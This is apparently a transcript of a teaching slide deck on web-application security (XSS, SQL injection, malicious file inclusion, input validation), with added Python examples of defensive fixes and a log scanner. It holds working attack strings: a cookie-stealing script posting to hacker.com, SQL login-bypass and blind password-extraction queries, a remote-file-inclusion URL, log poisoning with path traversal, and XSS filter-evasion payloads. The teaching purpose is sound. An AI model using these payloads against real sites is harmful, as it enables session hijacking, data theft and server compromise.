Why is Web Security Important - PowerPoint PPT Presentation

Slides: 34
Provided by: arashs

Transcript and Presenter's Notes
1

2
Why is Web Security Important?
  • Huge number of available targets
  • Heavy reliance on developers' skills
  • Relative simplicity of some techniques
  • Simplicity of remaining anonymous
  • Deep impact of a possible security compromise

3
Potential Targets
  • Web server operating system: RedHat Linux, Microsoft Windows
  • Web server software: Apache 2.2, IIS 7.0
  • Web platform and/or technology: PHP, Java EE, Microsoft .NET
  • Web application: web portal, e-commerce application

4
Cross-Site Scripting
  • What is Cross-Site Scripting (XSS)?
  • OWASP's 1st web security threat
  • Most widely used method for stealing credentials
  • The best example of how a vulnerable website threatens its users

5
Cross-Site Scripting
  • Vulnerability's origin: non-validated inputs that are
  • Directly shown in the page (Reflected)
  • Saved and shown indirectly (Stored)

6
Reflected XSS Attacks
  • http://www.site.com/error.aspx?msg=Session Expired

[Screenshot: the site's error page, Persian text around the message "Session Expired"]
7
Reflected XSS Attacks
  • http://www.site.com/error.aspx?msg=Session Expired<script>...</script>
  • This time, the script will be executed.

[Screenshot: the same error page, Persian text around the message "Session Expired", now with the injected script]
8
Reflected XSS Attacks

9
Reflected XSS Delivery Example
  • http://www.mysite.com/error.aspx?msg=survey+is+not+ready+yet.<script>...</script>
  • http://www.mysite.com/e%72%72%6f%72.aspx?msg%3dsurvey...

10
Stored XSS Attacks
11
XSS Attacks Payloads
  • The malicious script enables the hacker to
  • Hijack sessions and impersonate users
  • Exploit browser vulnerabilities
  • Virtually deface the website
  • Log keystrokes
  • Copy clipboard contents
  • Just one input that lacks validation is enough

12
SQL Injection
  • What is SQL Injection?
  • OWASP's 2nd web security threat
  • Most widely used method for penetrating websites, stealing sensitive data and performing defacements
  • Very short description: injecting SQL into inputs to change the application's internal queries

13
SQL A Quick Review
  • SELECT Username,Password FROM accounts WHERE Username='ferdowsi' AND Password='khorasan'

14
SQL Injection Simple Example
  • A vulnerable login page
  • SELECT * FROM accounts WHERE Username='ferdowsi' AND Password='khorasan'

15
SQL Injection Simple Example
  • What if someone enters
  • Username: ' OR 1=1--
  • Password: abc
  • SELECT * FROM accounts WHERE Username='' OR 1=1-- AND Password='abc'
  • Which is equivalent to
  • SELECT * FROM accounts WHERE 1=1-- AND ...
  • He successfully logs in without even knowing a username!

16
SQL Injection Advanced Example
  • A vulnerable news page
  • http://www.site.com/news.php?id=231
  • Returns news number 231, entitled "new system installation"
  • http://www.site.com/news.php?id=24453321
  • Does not return anything or shows an error message, because there is no news item with number 24453321
  • So if any error happens, the application stops executing and shows nothing.

17
SQL Injection Advanced Example
  • A vulnerable news page
  • http://www.site.com/news.php?id=231 and 1=1--
  • Returns news number 231, because the id equals 231 for the "new system installation" item AND 1 always equals 1.
  • http://www.site.com/news.php?id=231 and 1=0--
  • Does not return anything or shows an error message, because although news number 231 exists, 1 is not equal to 0.

18
SQL Injection Advanced Example
  • Pulling out the administrator's password from the database by exploiting the vulnerable page
  • http://www.site.com/news.php?id=231 and ascii(substring((SELECT Password from accounts where id=1),1,1))=100--
  • If the news page returns news number 231, then the first character of the administrator's password has an ASCII code of 100. In other words, the administrator's password starts with "d".
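The login and news queries from slides 13 to 18, rebuilt as an added Python example; this is not code from the presentation (the slides describe PHP and ASP.NET pages, and Python's sqlite3 module stands in here for the database). The table names, the ferdowsi/khorasan credentials and the id 231 are the slides' values; the column types and the has_boolean_oracle check are this example's own assumptions. The vulnerable functions concatenate the input into the query exactly as the slides show. The safe versions bind the input as a parameter and, for the news id, accept only a short decimal number, which removes both the login bypass and the true/false oracle that the advanced example depends on.

```python
import re
import sqlite3


def make_db():
    """Constructed sample database for the slides' examples (not a real schema)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE accounts (id INTEGER PRIMARY KEY, Username TEXT, Password TEXT)")
    con.execute("INSERT INTO accounts VALUES (1, 'ferdowsi', 'khorasan')")
    con.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT)")
    con.execute("INSERT INTO news VALUES (231, 'new system installation')")
    return con


# --- Slides 14-15: the login page -------------------------------------------

def login_vulnerable(con, username, password):
    """The slide's query, assembled by string concatenation."""
    sql = ("SELECT * FROM accounts WHERE Username='" + username
           + "' AND Password='" + password + "'")
    return con.execute(sql).fetchone()


def login_safe(con, username, password):
    """Same query with bound parameters: quotes and '--' in the input stay data."""
    sql = "SELECT * FROM accounts WHERE Username=? AND Password=?"
    return con.execute(sql, (username, password)).fetchone()


# --- Slides 16-18: the news page ---------------------------------------------

def news_vulnerable(con, id_param):
    """news.php?id=... with the id pasted into the query unquoted."""
    try:
        row = con.execute("SELECT title FROM news WHERE id=" + id_param).fetchone()
    except sqlite3.Error:
        return None  # slide 16: on any error the application shows nothing
    return row[0] if row else None


# Whitelist for the id: one to nine decimal digits, nothing else (assumption).
ID_RE = re.compile(r"[0-9]{1,9}")


def news_safe(con, id_param):
    """Whitelist the id as a short decimal integer, then bind it as a parameter."""
    if not ID_RE.fullmatch(id_param):
        return None
    row = con.execute("SELECT title FROM news WHERE id=?", (int(id_param),)).fetchone()
    return row[0] if row else None


def has_boolean_oracle(fetch):
    """True if the two probes from slide 17 give different results through `fetch`.

    A developer can run this against an endpoint during testing: any difference
    means the parameter reaches the database as SQL rather than as data.
    """
    return fetch("231 and 1=1--") != fetch("231 and 1=0--")


def main():
    con = make_db()
    print("vulnerable login bypassed:", login_vulnerable(con, "' OR 1=1--", "abc") is not None)
    print("safe login bypassed:     ", login_safe(con, "' OR 1=1--", "abc") is not None)
    print("vulnerable news oracle:  ", has_boolean_oracle(lambda p: news_vulnerable(con, p)))
    print("safe news oracle:        ", has_boolean_oracle(lambda p: news_safe(con, p)))


if __name__ == "__main__":
    main()
```

The parameter binding is what closes the hole; the integer whitelist is an extra layer that also gives the application a clean place to reject garbage before it reaches the database, which is the "deep analysis" slide 32 asks for.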

19
SQL Injection Risks
  • From exposing sensitive information, which often leads to full system compromise:
  • Database structure
  • Usernames and passwords
  • Personal information
  • Company's secrets
  • To system command execution on servers without proper configuration.

20
Malicious File Inclusion
  • What is File Inclusion?
  • OWASP's 3rd web security threat
  • Very dangerous, as it allows attackers to execute their own malicious server-side code.

21
Malicious File Inclusion
  • Remote file inclusion example: a vulnerable modular system
  • http://www.site.com/modules?module=articles&id=25
  • The system executes the module residing in articles.php. If the system does not check the included module, the hacker's code residing in code.php can simply be executed on the server by injecting a remote file:
  • http://www.site.com/modules?module=http://www.hacker.com/code&id=25

22
Malicious File Inclusion
  • The application developer disables remote inclusion and includes scripts from the modules/ directory.
  • http://www.site.com/modules?module=articles&id=25
  • Executes
  • /home/webserver/public_html/site/modules/articles.php
  • Bad news: the hacker is still able to execute his own code. But how?

23
Malicious File Inclusion
  • The web server writes a copy of each request to a standard log file, which looks like this:
  • 192.168.101.21 - - [08/Aug/2009:23:17:12 +0430] "GET /page1.html HTTP/1.1" 200 111
  • 192.168.105.211 - - [08/Aug/2009:23:17:21 +0430] "GET /page2.html HTTP/1.1" 200 111
  • 192.168.102.57 - - [29/Aug/2009:19:00:41 +0430] "GET /serve/22660/348386.jpg HTTP/1.1" 404 220
  • 217.219.186.24 - - [07/Sep/2009:13:32:12 +0430] "GET /page1.html HTTP/1.1" 200 111
  • Logging is essential and is not a security threat on its own.

24
Malicious File Inclusion
  • The hacker injects his code into the log file with a single HTTP request:
  • 192.168.101.21 - - [08/Aug/2009:23:17:12 +0430] "GET /page1.html HTTP/1.1" 200 111
  • 192.168.105.211 - - [08/Aug/2009:23:17:21 +0430] "GET /page2.html HTTP/1.1" 200 111
  • 192.168.102.57 - - [29/Aug/2009:19:00:41 +0430] "GET /serve/22660/348386.jpg HTTP/1.1" 404 220
  • 217.219.186.24 - - [07/Sep/2009:13:32:12 +0430] "GET /page1.html HTTP/1.1" 200 111
  • 217.219.102.101 - - [08/Sep/2009:17:16:04 +0430] "<?php evil_code ?>" 400 220
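The log-poisoning step on slides 23 and 24 is visible in the access log itself, so a defender can look for it. The following is an added Python example, not part of the presentation: a parser for the Apache common log format the slides show, followed by a scan that flags entries whose request field is not a well-formed request line or contains a PHP open tag after percent-decoding. The sample lines are the slides' entries plus one constructed line (client 10.0.0.5) that carries the same tag percent-encoded inside an otherwise ordinary GET; the regular expressions and the `evil_code` placeholder are this example's own.

```python
import re
from urllib.parse import unquote

# Apache common log format, as on slide 23: host ident user [time] "request" status bytes
LOG_RE = re.compile(
    r'^(?P<ip>\S+) (?P<ident>\S+) (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<request>[^"]*)" (?P<status>\d{3}) (?P<size>\S+)$'
)

# A well-formed request line is METHOD SP REQUEST-URI SP HTTP-VERSION, checked on the raw field.
REQUEST_LINE_RE = re.compile(r'^[A-Z]+ \S+ HTTP/\d\.\d$')

# PHP open tags: "<?php" or the short echo tag "<?=", checked after percent-decoding.
PHP_TAG_RE = re.compile(r'<\?(php|=)', re.IGNORECASE)

# Constructed sample: the slides' five entries plus one (10.0.0.5) with the tag URL-encoded.
SAMPLE_LOG = """\
192.168.101.21 - - [08/Aug/2009:23:17:12 +0430] "GET /page1.html HTTP/1.1" 200 111
192.168.105.211 - - [08/Aug/2009:23:17:21 +0430] "GET /page2.html HTTP/1.1" 200 111
192.168.102.57 - - [29/Aug/2009:19:00:41 +0430] "GET /serve/22660/348386.jpg HTTP/1.1" 404 220
217.219.186.24 - - [07/Sep/2009:13:32:12 +0430] "GET /page1.html HTTP/1.1" 200 111
217.219.102.101 - - [08/Sep/2009:17:16:04 +0430] "<?php evil_code ?>" 400 220
10.0.0.5 - - [08/Sep/2009:17:20:00 +0430] "GET /page1.html?q=%3C%3Fphp%20evil_code%20%3F%3E HTTP/1.1" 200 111
"""


def parse_line(line):
    """Return the fields of one common-log line as a dict, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify_request(raw_request):
    """List the reasons a logged request field looks like an attempt to poison the log."""
    reasons = []
    if not REQUEST_LINE_RE.match(raw_request):
        reasons.append("malformed request line")
    if PHP_TAG_RE.search(unquote(raw_request)):
        reasons.append("PHP open tag in request")
    return reasons


def scan_log(text):
    """Return a list of (line_no, client_ip, reason) for every suspicious entry."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        entry = parse_line(line)
        if entry is None:
            findings.append((n, None, "unparseable line"))
            continue
        reasons = classify_request(entry["request"])
        if reasons:
            findings.append((n, entry["ip"], "; ".join(reasons)))
    return findings


if __name__ == "__main__":
    for line_no, ip, reason in scan_log(SAMPLE_LOG):
        print(f"line {line_no} from {ip}: {reason}")
```

The 400 status on the slide's poisoned line is a second signal worth alerting on: a server that logs a rejected request still writes the request bytes, which is exactly why the log becomes useful to the attacker on slide 25.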

25
Malicious File Inclusion
  • The hacker is now able to execute his code, which resides in the web server's log file:
  • http://www.site.com/modules?module=../../../../../usr/local/apache/logs/access.log%00&id=25
  • Executes
  • /home/webserver/public_html/site/modules/../../../../../usr/local/apache/logs/access.log
  • Which contains the hacker's code (<?php evil_code ?>)
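What the fix on slide 22 lacks is a check on the module name itself. Below is an added Python example, not code from the presentation (the slides describe a PHP include; Python only illustrates the path handling). It contrasts the unchecked join the slides describe with a resolver that refuses NUL bytes, whitelists the module name with a regular expression, confirms the resolved path is still under modules/, and requires the file to exist. The directory layout is a constructed temporary directory; the module name pattern and the /home/webserver/... path used for the demonstration are taken from or assumed for this example.

```python
import os
import re
import tempfile

# Module names the application actually ships: lowercase identifiers only (assumption).
MODULE_NAME_RE = re.compile(r"[a-z][a-z0-9_]{0,31}")


def resolve_module_vulnerable(modules_dir, module):
    """The slide-22 behaviour: join the name onto modules/ and include it, no checks.

    Returned only to show the path the server would open; traversal and the
    %00 truncation of the ".php" suffix are not stopped here.
    """
    return os.path.normpath(os.path.join(modules_dir, module + ".php"))


def resolve_module_safe(modules_dir, module):
    """Return the file to include, or None if the request must be refused.

    1. no NUL bytes (defeats the %00 truncation trick),
    2. the name matches a strict whitelist (defeats ../ sequences and URLs),
    3. the resolved real path is still under modules/ (defence in depth),
    4. the file exists (unknown modules are refused, not searched for).
    """
    if "\x00" in module or not MODULE_NAME_RE.fullmatch(module):
        return None
    base = os.path.realpath(modules_dir)
    path = os.path.realpath(os.path.join(base, module + ".php"))
    if os.path.commonpath([base, path]) != base:
        return None
    if not os.path.isfile(path):
        return None
    return path


def is_allowed(modules_dir, module):
    """Convenience wrapper: True if the safe resolver accepts the module name."""
    return resolve_module_safe(modules_dir, module) is not None


def make_modules_dir():
    """Constructed modules/ directory holding the slides' articles.php."""
    d = tempfile.mkdtemp(prefix="modules_")
    with open(os.path.join(d, "articles.php"), "w") as f:
        f.write("<?php /* articles module (constructed placeholder) */ ?>\n")
    return d


# The three module values that appear on slides 21 to 25.
SLIDE_INPUTS = [
    "articles",
    "http://www.hacker.com/code",
    "../../../../../usr/local/apache/logs/access.log\x00",
]

if __name__ == "__main__":
    d = make_modules_dir()
    for m in SLIDE_INPUTS:
        print(repr(m), "->", "allowed" if is_allowed(d, m) else "refused")
    # The unchecked join resolves the slide-25 value to the log file path.
    print(resolve_module_vulnerable("/home/webserver/public_html/site/modules", SLIDE_INPUTS[2]))
```

The whitelist alone already rejects all three hostile values; the realpath check exists so that a later loosening of the pattern (say, allowing a subdirectory separator) cannot silently reintroduce traversal.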

26
Importance of Input Validation
  • Why were the previous attacks successful?
  • One reason: inputs were not validated.
  • Inputs are not just form data or query string parameters.
  • A single non-validated input is enough for the hacker to perform his attack.
  • Efficient input validation is not as easy as it seems.

27
Importance of PROPER Input Validation
  • How does one hijack sessions with XSS attacks?
  • <script>
  • var x = new Image();
  • x.src = "http://www.hacker.com/grab?c=" + document.cookie;
  • </script>
  • We filter <script> in inputs.
  • We filter document.cookie in inputs.
  • We put a length limitation of 50 characters on the msg input.
  • Bad news: all three methods fail.

28
Importance of PROPER Input Validation
  • How blacklisting <script> fails:
  • 1. <sCRiPt>...
  • 2. <script >...
  • 3. a"><span style="color:expression(alert(document.cookie))">
  • 4. a">%00<script>...
  • 5. %253cscript%253e
  • 8. ...

29
Importance of PROPER Input Validation
  • How blacklisting document.cookie fails:
  • var a = "alert(doc" + "ument.coo" + "kie)"; eval(a)
  • var a = "alert(" + String.fromCharCode(100,111,99,117,109,101,110,116,46,99,111,111,107,105,101) + ")"; eval(a)
  • Both show cookies, but also pass the validation, as they don't contain document.cookie

30
Importance of PROPER Input Validation
  • How length limitations fail
  • Technique 1: accessing the URI indirectly
  • http://www.mysite.com/error.php?msg=
  • <script>eval(location.substr(indexOf('a')))</script>
  • a<script>...very long one...</script>

31
Importance of PROPER Input Validation
  • How length limitations fail
  • Technique 2: using multiple inputs
  • <input type="hidden" name="page_id" value="a"><script>/*">
  • ...
  • <input type="hidden" name="seed" value="*/alert(document.cookie)/*">
  • ...
  • <input type="hidden" name="mode" value="*/</script>">

32
Importance of PROPER Input Validation
  • How to validate inputs properly?
  • Inputs should be deeply analyzed.
  • All inputs should be validated against white-lists powered by regular expressions.
  • Special characters should be encoded properly.
  • If a validation technique blocks XSS attacks, it may not block SQL Injection attacks.
  • Input validation mechanisms should not put too much overhead on request processing.
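The contrast between slides 27 to 29 (the blacklist that fails) and slide 32 (whitelist plus encoding) in running code. This is an added Python example, not code from the presentation, and it models the slides' error page from slides 6 and 7 as a function rather than an ASP.NET page. The blacklist rules are the three the slides list; the whitelist pattern, the "Invalid message" fallback and the sample strings are this example's own, with the evasion strings taken from the slides and constructed as test input.

```python
import html
import re


def blacklist_filter(value):
    """The three rules from slide 27: block '<script>', block 'document.cookie', cap at 50."""
    if "<script>" in value or "document.cookie" in value or len(value) > 50:
        return None
    return value


# Whitelist for the error message: letters, digits, space and light punctuation (assumption).
MSG_RE = re.compile(r"[A-Za-z0-9 .,!?'-]{1,50}")


def validate_msg(value):
    """Return the value only if every character is on the whitelist."""
    return value if MSG_RE.fullmatch(value) else None


def render_error_vulnerable(msg):
    """Slides 6 and 7: the msg parameter echoed verbatim into the page."""
    return "<p class='error'>" + msg + "</p>"


def render_error_safe(msg):
    """Whitelist the input, then HTML-encode it on output.

    Encoding is what keeps the browser from reading the value as markup;
    the whitelist additionally refuses anything the page has no use for.
    """
    checked = validate_msg(msg)
    if checked is None:
        checked = "Invalid message"
    return "<p class='error'>" + html.escape(checked, quote=True) + "</p>"


# The evasions from slides 28 and 29, as constructed test strings.
BYPASSES = [
    "<sCRiPt>...",
    "<script >...",
    "%253cscript%253e",
    "var a='alert(doc'+'ument.coo'+'kie)';eval(a)",
]


def main():
    for b in BYPASSES:
        print(f"{b!r:50} blacklist: {'pass' if blacklist_filter(b) else 'block'}"
              f"  whitelist: {'pass' if validate_msg(b) else 'block'}")
    print(render_error_vulnerable("Session Expired<script>...</script>"))
    print(render_error_safe("Session Expired<script>...</script>"))


if __name__ == "__main__":
    main()
```

Note that the whitelist deliberately allows the apostrophe, since real messages contain it; that is the slide-32 point in miniature, because a character that is harmless once HTML-encoded is still meaningful to SQL, so the database layer needs its own defence (bound parameters) rather than relying on this filter.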

33
Conclusion
  • Security should be considered a must from the beginning of the design and development process.
  • Developers themselves should be trained in security strategies and common threats.
  • Additional time and effort should be put into the application's security verification.
  • But even a highly secure web application does not survive on an insecure web server.